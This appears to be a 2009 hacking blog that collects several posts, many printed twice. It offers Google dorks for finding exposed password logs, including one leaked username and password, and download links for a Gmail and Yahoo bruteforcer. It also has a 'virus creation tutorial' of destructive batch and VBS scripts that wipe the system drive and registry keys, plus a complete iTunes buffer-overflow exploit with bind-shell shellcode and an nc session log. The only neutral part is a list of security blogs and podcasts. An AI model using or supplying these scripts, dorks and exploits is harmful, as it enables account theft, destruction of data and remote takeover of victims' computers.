In this guide I will try my best to teach you how to use google to get your usernames and passwords for random sites....
Its pretty simple and all you need is a brain
--------------------
Tutorial By Casi
@ CyberXtreme.info
--------------------
So lets get started...
Start u your favorite internet browser, I am using firefox
Then go to
Code:
www.google.comAnd type in the below code
Code:
filetype:log inurl:*password.log"This will find all websites that stored a "password.log" on their servers, and you will be able to see the login and password for different users to different sites
Now google is being a bit smart asses, and you wont get the results on the 1st page, at least I did not, so bump out to 3+ pages and they started showing up for me
Below is an example of what I got
Code:
name: = "procesos"; password: = "procesos"; URL: = "http://ayura.udea.edu.co/Here comes a 2nd way to do it, better and more effective in my opinion...
Once again, go to google
Type in the code below
Code:
ext:pwd inurl:(service authors administrators users) *#-FrontPage-*Hit Search and.. youll get it by there..
Monday, August 3, 2009
Thursday, July 30, 2009
Gmail and Yahoo Bruteforcer
Gmail and Yahoo Bruteforcer
--------------------------------------------------------------------------------
Gmail and Yahoo Bruteforcer
This is probably one of the best things. A cracker for both Gmail & Yahoo.
If it doesn't work, Extract the .exe file on your desktop, right click on it, and press run as administrator.
DownloaD
Code:
http://rapidshare.com/files/199124494/MailBruteforcer.rar
1gig wordlist compressed to a 5mb archive
http://digg.com/security/1GB_Wordlis..._a_5Mb_Archive
EDIT-------------
RUN THROUGH SANDBOX HAVNT BEEN TESTED
Download: http://www.megaupload.com/?d=3YQT6SRB
Mirror2: http://www.filefactory.com/file/afh8...Bec0de_com_rar
Mirror3: http://www.sendspace.com/file/0ik9fx
--------------------------------------------------------------------------------
Gmail and Yahoo Bruteforcer
This is probably one of the best things. A cracker for both Gmail & Yahoo.
If it doesn't work, Extract the .exe file on your desktop, right click on it, and press run as administrator.
DownloaD
Code:
http://rapidshare.com/files/199124494/MailBruteforcer.rar
1gig wordlist compressed to a 5mb archive
http://digg.com/security/1GB_Wordlis..._a_5Mb_Archive
EDIT-------------
RUN THROUGH SANDBOX HAVNT BEEN TESTED
Download: http://www.megaupload.com/?d=3YQT6SRB
Mirror2: http://www.filefactory.com/file/afh8...Bec0de_com_rar
Mirror3: http://www.sendspace.com/file/0ik9fx
Monday, July 27, 2009
Security Webs & Blogs & Podcasts
Webs
Spain
www.dgonzalez.net Diego González Gómez
www.javierpages.com (Blog: www.inforenses.com) Javier Pagès
www.ausejo.net Rafael Ausejo Prieto
www.seguridaddelainformacion.com Vicente Aceituno
Apuntes de seguridad de la información (Blog) Javier Cao Avellaneda
Jessland Jess Garcia
Hispasec Blog (Hispasec)
Worldwide Blogs
Spain
Worldwide
www.chuvakin.org (www.info-secure.org) Anton Chuvakin - Security Warrior
www.counterhack.net Ed Skoudis - (Counter)hacking, Malware, Security Challenges
Joshwr1ght Joshua Wright - Wireless Security
www.zeltser.com (Information Security Search engine) Lenny Zeltser - GSE
www.hexblog.com Ilfak Guilfanov - IDA Pro
www.schneier.com (Blog: www.schneier.com/blog/) Bruce Schneier
www.sysinternals.com (Blog: www.sysinternals.com/blog/) Mark Russinovich - Windows
Internals
grc.com (Discussions) Steve Gibson (GRC) - Windows
www.petefinnigan.com (Blog: Oracle Security and Forums) Pete Finnigan - Oracle Security
www.trouble.org (www.fish2.com) Dan Farmer - Forensics
www.porcupine.org Wietse Venema - Forensics
www.digital-evidence.org (Sleuthkit) Brian Carrier - Forensics
johnny.ihackstuff.com Johnny Long - Google Hacking (GHDB)
honeyblog.org (Blog) Thorsten Holz
www.wormblog.com (Blog) Jose Nazario
PaulDotCom's Web Site (Blog) Paul Asadoorian
Hack a day Hack a day (beta) Blog
isc.sans.org Handler's Diary - ISC
The Black Page Blackhat: highlights breaking security research
Security Podcasts
Security (... professionals)
Cyberspeak Computer Forensics, Network Security and Computer Crime Podcast
Security Now! Audio security column & podcast by Steve Gibson (GRC) and Leo Laporte
PaulDotCom's Podcast Paul Asadoorian security podcasts (podcasts roundup)
SABAG security Two guys from McAfee, a bit of security and some toast... (CISSP CPEs)
McKeay RSS Martin McKeay's Network Security Podcast
Blue Box The VoIP Security Podcast
Crypto-Gram security podcast RSS Audio of Bruce Schneier's Crypto-Gram Newsletter
The Security Catalyst For anyone interested in security - home users to professionals (CISSP)
Security (... hacking)
Sploitcast The podcast for hackers, geeks, and the security paranoid
BinRev Binary Revolution radio: The Revolution will be Digitized!
Hackermedia Hackermedia is on the air
LiveAmmo Radio
Ninja Night School
The Packet Sniffers Video shows
The hackers voice UK (Continuous radio - NO podcast)
T.W.A.T radio
Hack5 videos VIDEOS
Security News & Managerial
SearchSecurity.com's Security Wire Weekly
Gartner Voice Podcasts for business and IT professionals
CSOonline CSO's executive podcast
CIO Security CIO's security podcast
IT
Geek Muse IT OS geeks Podcast (& Blog) - referenced by Labrat-
In the trenches The podcast for Sys Admins (Kevin Devin)
Friends in tech
--------------------------------------------------------------------------------
Spain
www.dgonzalez.net Diego González Gómez
www.javierpages.com (Blog: www.inforenses.com) Javier Pagès
www.ausejo.net Rafael Ausejo Prieto
www.seguridaddelainformacion.com Vicente Aceituno
Apuntes de seguridad de la información (Blog) Javier Cao Avellaneda
Jessland Jess Garcia
Hispasec Blog (Hispasec)
Worldwide Blogs
Spain
Worldwide
www.chuvakin.org (www.info-secure.org) Anton Chuvakin - Security Warrior
www.counterhack.net Ed Skoudis - (Counter)hacking, Malware, Security Challenges
Joshwr1ght Joshua Wright - Wireless Security
www.zeltser.com (Information Security Search engine) Lenny Zeltser - GSE
www.hexblog.com Ilfak Guilfanov - IDA Pro
www.schneier.com (Blog: www.schneier.com/blog/) Bruce Schneier
www.sysinternals.com (Blog: www.sysinternals.com/blog/) Mark Russinovich - Windows
Internals
grc.com (Discussions) Steve Gibson (GRC) - Windows
www.petefinnigan.com (Blog: Oracle Security and Forums) Pete Finnigan - Oracle Security
www.trouble.org (www.fish2.com) Dan Farmer - Forensics
www.porcupine.org Wietse Venema - Forensics
www.digital-evidence.org (Sleuthkit) Brian Carrier - Forensics
johnny.ihackstuff.com Johnny Long - Google Hacking (GHDB)
honeyblog.org (Blog) Thorsten Holz
www.wormblog.com (Blog) Jose Nazario
PaulDotCom's Web Site (Blog) Paul Asadoorian
Hack a day Hack a day (beta) Blog
isc.sans.org Handler's Diary - ISC
The Black Page Blackhat: highlights breaking security research
Security Podcasts
Security (... professionals)
Cyberspeak Computer Forensics, Network Security and Computer Crime Podcast
Security Now! Audio security column & podcast by Steve Gibson (GRC) and Leo Laporte
PaulDotCom's Podcast Paul Asadoorian security podcasts (podcasts roundup)
SABAG security Two guys from McAfee, a bit of security and some toast... (CISSP CPEs)
McKeay RSS Martin McKeay's Network Security Podcast
Blue Box The VoIP Security Podcast
Crypto-Gram security podcast RSS Audio of Bruce Schneier's Crypto-Gram Newsletter
The Security Catalyst For anyone interested in security - home users to professionals (CISSP)
Security (... hacking)
Sploitcast The podcast for hackers, geeks, and the security paranoid
BinRev Binary Revolution radio: The Revolution will be Digitized!
Hackermedia Hackermedia is on the air
LiveAmmo Radio
Ninja Night School
The Packet Sniffers Video shows
The hackers voice UK (Continuous radio - NO podcast)
T.W.A.T radio
Hack5 videos VIDEOS
Security News & Managerial
SearchSecurity.com's Security Wire Weekly
Gartner Voice Podcasts for business and IT professionals
CSOonline CSO's executive podcast
CIO Security CIO's security podcast
IT
Geek Muse IT OS geeks Podcast (& Blog) - referenced by Labrat-
In the trenches The podcast for Sys Admins (Kevin Devin)
Friends in tech
--------------------------------------------------------------------------------
Sunday, July 26, 2009
The 8 deadly windows .vbs commands
Note:- The Following tutorial is for educational purpose only. If you harm your or your friend’s computer using the following tutorial
I am going to provide some of my favorite .vbs codes, I use to play with in my childhood days. You can use these codes as a small term virus. Hence , you can also call this tutorial a virus creation tutorial.
To use the codes I am going to provide, all you need to do is to copy the codes from iTechnoBuzz, paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.
*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.
-The blue screen of Death [this might be dangerous]
Code:-
Code:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
-Stupidity Shutdown
*This pops up a funny message then will shutdown the computer*
code:-
Code:
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10
-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*
Code:-
Code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE
-Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*
Code:-
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
-Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*
Code:-
Code:
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
-Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*
Code:-
Code:
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
-Endless Backspace
*This makes it so the backspace key is constantly being pressed*
Code:-
Code:
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
-Popping CD Drives
*This will make the CD drives constantly pop out*
Code:-
Code:
Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
__________________
I am going to provide some of my favorite .vbs codes, I use to play with in my childhood days. You can use these codes as a small term virus. Hence , you can also call this tutorial a virus creation tutorial.
To use the codes I am going to provide, all you need to do is to copy the codes from iTechnoBuzz, paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.
*NOTE* these codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.
-The blue screen of Death [this might be dangerous]
Code:-
Code:
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
-Stupidity Shutdown
*This pops up a funny message then will shutdown the computer*
code:-
Code:
@echo off
msg * Fatal system error due to admin stupidity!
shutdown -c “Error! You are too stupid!” -s -t 10
-Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*
Code:-
Code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked. Have a nice day.
GOTO MESSAGE
-Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*
Code:-
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
-Crazy caps lock
*This constantly turns caps lock on and off really fast continuously*
Code:-
Code:
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
-Endless Enter
*This constantly makes it so the enter button is being pressed continuesly*
Code:-
Code:
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
-Endless Backspace
*This makes it so the backspace key is constantly being pressed*
Code:-
Code:
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
-Popping CD Drives
*This will make the CD drives constantly pop out*
Code:-
Code:
Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
__________________
[0]day itunes exploit
#!/usr/bin/python
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# www.offensive-security.com/blog/vulndev/itunes-exploitation-case-study/
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce - 06/10/2009
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
#
# Vulnerability can't be exploited simply overwriting a return address on the
# stack because of stack canary protection. Increasing buffer size leads to
# SEH overwrite but it seems that the Access Violation needed to get our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# - the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# - the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the vulnerability from Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Mozilla Firefox>
from socket import *
html = """
iTunes loading . . .
"""
# Alpha2 ASCII printable Shellcode 730 Bytes, via EDX (0x60,0x40 Badchar)
# This is not standard Alpha2 bind shell. Beginning of shellcode is modified
# in order to obtain register alignment and to reset ESP and EBP we mangled
# before. Rest of decoded shellcode is Metasploit bind shell on port 4444
# EXITFUNC=thread
#
shellcode = ("VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"
"5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"
"tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"
"uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"
"KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"
"8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"
"b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"
"k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"
"EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"
"0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"
"ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"
"KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA")
# Padding
pad0x1 = "\x41"*425
# Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t
align = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10
# Padding
pad0x2 = "\x41"*570
# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
ret = "\x2a\x5e\x21\x67"
# Let the dance begin... Point EBP to encoded jmp
align_for_jmp = "\x61\x45\x45\x45" + ret + "\x44" + "\x45"*7
# Decode a NEAR JMP and JUMP BACK BABY!
jmp_back = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
"AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA")
# Padding
pad0x3 = "\x43"*162
# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1 = "itms://:" + "\x41"*200 + "/"
url2 = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +\
align_for_jmp + jmp_back + pad0x3
payload = html % (url1, url2)
print "[+] iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950"
print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com"
print "[+] www.offensive-security.com"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(payload)
print "[+] Payload sent, wait 20 secs for iTunes error!"
c.close()
s.close()
# Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit
# www.offensive-security.com/blog/vulndev/itunes-exploitation-case-study/
# Matteo Memelli | ryujin __A-T__ offensive-security.com
# Spaghetti & Pwnsauce - 06/10/2009
# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-03
#
# Vulnerability can't be exploited simply overwriting a return address on the
# stack because of stack canary protection. Increasing buffer size leads to
# SEH overwrite but it seems that the Access Violation needed to get our own
# Exception Handler called is not always thrown.
# So, to increase reliability, the exploit sends two URI to iTunes:
# - the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)
# - the 2nd payload fully overwrite SEH to 0wN EIP
# Payloads must be encoded in order to obtain pure ASCII printable shellcode.
# I could trigger the vulnerability from Firefox but not from IE that seems
# to truncate the long URI.
# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,
# iTunes 8.1.1.10, 8.1.0.52
#
# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why
#
# ryujin:Desktop ryujin$ ./ipwn.py
# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-0950
# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com
# [+] www.offensive-security.com
# [+] Spaghetti & Pwnsauce
# [+] Listening on port 80
# [+] Connection accepted from: 172.16.30.7
# [+] Payload sent, wait 20 secs for iTunes error!
# ryujin:Desktop ryujin$ nc -v 172.16.30.7 4444
# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Mozilla Firefox>
from socket import *
html = """
iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950
ryujin __ A-T __ offensive-security.com
www.offensive-security.com
iTunes starting... wait for 20 secs; if you get an error, click "Ok"
in the MessageBox before checking for your shell on port 4444 :)
If victim host is not connected to the internet, exploit will fail
unless iTunes is already opened and you disable "openiTunes" javascript
function.
This exploit works if opened from Firefox not from IE!
After exploitation iTunes crashes, you need to kill it from TaskManager
have fun!
"""
# Alpha2 ASCII printable Shellcode 730 Bytes, via EDX (0x60,0x40 Badchar)
# This is not standard Alpha2 bind shell. Beginning of shellcode is modified
# in order to obtain register alignment and to reset ESP and EBP we mangled
# before. Rest of decoded shellcode is Metasploit bind shell on port 4444
# EXITFUNC=thread
#
shellcode = ("VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"
"5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"
"tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"
"uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"
"KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"
"8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"
"b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"
"k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"
"EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"
"0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"
"ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"
"KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA")
# Padding
pad0x1 = "\x41"*425
# Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t
align = "\x61"*45 + "\x54\x5A" + "\x42"*6 + "V"*10
# Padding
pad0x2 = "\x41"*570
# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet
# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)
ret = "\x2a\x5e\x21\x67"
# Let the dance begin... Point EBP to encoded jmp
align_for_jmp = "\x61\x45\x45\x45" + ret + "\x44" + "\x45"*7
# Decode a NEAR JMP and JUMP BACK BABY!
jmp_back = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"
"AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA")
# Padding
pad0x3 = "\x43"*162
# We send 2 payloads to iTunes: first is itms and second itpc
# url1 smashes the stack in order to get an AV later
url1 = "itms://:" + "\x41"*200 + "/"
url2 = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +\
align_for_jmp + jmp_back + pad0x3
payload = html % (url1, url2)
print "[+] iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950"
print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com"
print "[+] www.offensive-security.com"
print "[+] Spaghetti & Pwnsauce"
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 80))
s.listen(1)
print "[+] Listening on port 80"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(payload)
print "[+] Payload sent, wait 20 secs for iTunes error!"
c.close()
s.close()
Anonymous Surfing Tool 2009
01 #1 Anonymous Proxy List Verifier 1.1
02 Anonimity 4 Proxy2.8
03 Charon 0.6
04 Get Anonymous 2.1
05 GhostSurf Platinum
06 Hide ip Platinum 3.42
07 Hide The Ip 2.1.1
08 Invisible Browsing 5
09 IP Switcher Professional 1.01.12.0
10 MultiProxy v1.2
11 NetConceal Anonymity Shield 5.2.059.02
12 Proxy Switcher Standard 3.7.2.3913
13 Proxygrab 0.6
14 proxyway extra v3.2
15 SmartProxyHelper 1.5
16 Steganos Internet Anonym v8.0.1
etc.
Code:
http://uploading.com/files/BHFKMOMA/IP_Anonymous_Surfing_Tool_2009.rar.html
02 Anonimity 4 Proxy2.8
03 Charon 0.6
04 Get Anonymous 2.1
05 GhostSurf Platinum
06 Hide ip Platinum 3.42
07 Hide The Ip 2.1.1
08 Invisible Browsing 5
09 IP Switcher Professional 1.01.12.0
10 MultiProxy v1.2
11 NetConceal Anonymity Shield 5.2.059.02
12 Proxy Switcher Standard 3.7.2.3913
13 Proxygrab 0.6
14 proxyway extra v3.2
15 SmartProxyHelper 1.5
16 Steganos Internet Anonym v8.0.1
etc.
Code:
http://uploading.com/files/BHFKMOMA/IP_Anonymous_Surfing_Tool_2009.rar.html
Subscribe to:
Posts (Atom)